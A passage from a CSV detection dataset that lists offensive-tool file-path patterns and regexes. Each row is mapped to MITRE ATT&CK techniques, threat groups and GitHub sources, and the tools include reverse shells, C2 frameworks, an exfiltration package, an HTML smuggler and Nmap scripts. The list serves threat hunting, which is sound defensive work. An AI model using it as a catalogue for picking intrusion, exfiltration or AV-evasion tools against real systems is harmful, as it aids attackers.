T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","7820" "*/HRShell/*",".{0,1000}\/HRShell\/.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","7821" "*/hta_attack/*",".{0,1000}\/hta_attack\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","7822" "*/hta_gen.py*",".{0,1000}\/hta_gen\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","7823" "*/HTMLSmuggler.git*",".{0,1000}\/HTMLSmuggler\.git.{0,1000}","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","N/A","10","2","162","19","2024-02-27T23:03:55Z","2023-07-02T08:10:59Z","7824" "*/HTMLSmuggler/*",".{0,1000}\/HTMLSmuggler\/.{0,1000}","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","N/A","10","2","162","19","2024-02-27T23:03:55Z","2023-07-02T08:10:59Z","7825" 
"*/htran.exe*",".{0,1000}\/htran\.exe.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","1","N/A","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","7826" "*/HTran.git*",".{0,1000}\/HTran\.git.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","1","N/A","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","7827" "*/Htran-master.zip*",".{0,1000}\/Htran\-master\.zip.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. 
It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","1","N/A","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","7828" "*/htshells.git*",".{0,1000}\/htshells\.git.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","7829" "*/http_exfiltration.py*",".{0,1000}\/http_exfiltration\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","7830" "*/http_payload.ps1*",".{0,1000}\/http_payload\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","7831" "*/http-adobe-coldfusion-apsa1301.nse*",".{0,1000}\/http\-adobe\-coldfusion\-apsa1301\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7832" "*/http-affiliate-id.nse*",".{0,1000}\/http\-affiliate\-id\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7833" "*/http-apache-negotiation.nse*",".{0,1000}\/http\-apache\-negotiation\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7834" "*/http-apache-server-status.nse*",".{0,1000}\/http\-apache\-server\-status\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7835" "*/http-aspnet-debug.nse*",".{0,1000}\/http\-aspnet\-debug\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7836" "*/httpattack.py*",".{0,1000}\/httpattack\.py.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550.003 - T1557.002 - T1552.004 - T1212 - T1550","TA0009 - TA0008","N/A","N/A","Lateral Movement","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","N/A","8","737","82","2025-01-03T14:25:52Z","2021-07-27T19:06:09Z","7837" "*/http-auth.nse*",".{0,1000}\/http\-auth\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7838" "*/http-auth-finder.nse*",".{0,1000}\/http\-auth\-finder\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7839" "*/http-avaya-ipoffice-users.nse*",".{0,1000}\/http\-avaya\-ipoffice\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7840" "*/http-awstatstotals-exec.nse*",".{0,1000}\/http\-awstatstotals\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7841" "*/http-axis2-dir-traversal.nse*",".{0,1000}\/http\-axis2\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7842" "*/http-backup-finder.nse*",".{0,1000}\/http\-backup\-finder\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7843" "*/http-barracuda-dir-traversal.nse*",".{0,1000}\/http\-barracuda\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7844" "*/http-bigip-cookie.nse*",".{0,1000}\/http\-bigip\-cookie\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7845" "*/http-brute.nse*",".{0,1000}\/http\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7846" "*/http-c2.go*",".{0,1000}\/http\-c2\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","7847" "*/http-cakephp-version.nse*",".{0,1000}\/http\-cakephp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7848" "*/http-chrono.nse*",".{0,1000}\/http\-chrono\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7849" "*/http-cisco-anyconnect.nse*",".{0,1000}\/http\-cisco\-anyconnect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7850" "*/HTTP-Client.sh*",".{0,1000}\/HTTP\-Client\.sh.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","#linux","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","7851" "*/http-coldfusion-subzero.nse*",".{0,1000}\/http\-coldfusion\-subzero\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7852" "*/http-comments-displayer.nse*",".{0,1000}\/http\-comments\-displayer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7853" "*/http-config-backup.nse*",".{0,1000}\/http\-config\-backup\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7854" "*/http-cookie-flags.nse*",".{0,1000}\/http\-cookie\-flags\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7855" "*/http-cors.nse*",".{0,1000}\/http\-cors\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7856" "*/http-cross-domain-policy.nse*",".{0,1000}\/http\-cross\-domain\-policy\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7857" "*/http-csrf.nse*",".{0,1000}\/http\-csrf\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7858" "*/http-date.nse*",".{0,1000}\/http\-date\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7859" "*/http-default-accounts.nse*",".{0,1000}\/http\-default\-accounts\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7860" "*/http-devframework.nse*",".{0,1000}\/http\-devframework\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7861" "*/http-dlink-backdoor.nse*",".{0,1000}\/http\-dlink\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7862" "*/http-dombased-xss.nse*",".{0,1000}\/http\-dombased\-xss\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7863" "*/http-domino-enum-passwords.nse*",".{0,1000}\/http\-domino\-enum\-passwords\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7864" "*/http-drupal-enum.nse*",".{0,1000}\/http\-drupal\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7865" "*/http-drupal-enum-users.nse*",".{0,1000}\/http\-drupal\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7866" "*/http-enum.nse*",".{0,1000}\/http\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7867" "*/http-errors.nse*",".{0,1000}\/http\-errors\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7868" "*/http-exif-spider.nse*",".{0,1000}\/http\-exif\-spider\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7869" "*/http-favicon.nse*",".{0,1000}\/http\-favicon\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7870" "*/http-feed.nse*",".{0,1000}\/http\-feed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7871" "*/http-fetch.nse*",".{0,1000}\/http\-fetch\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability 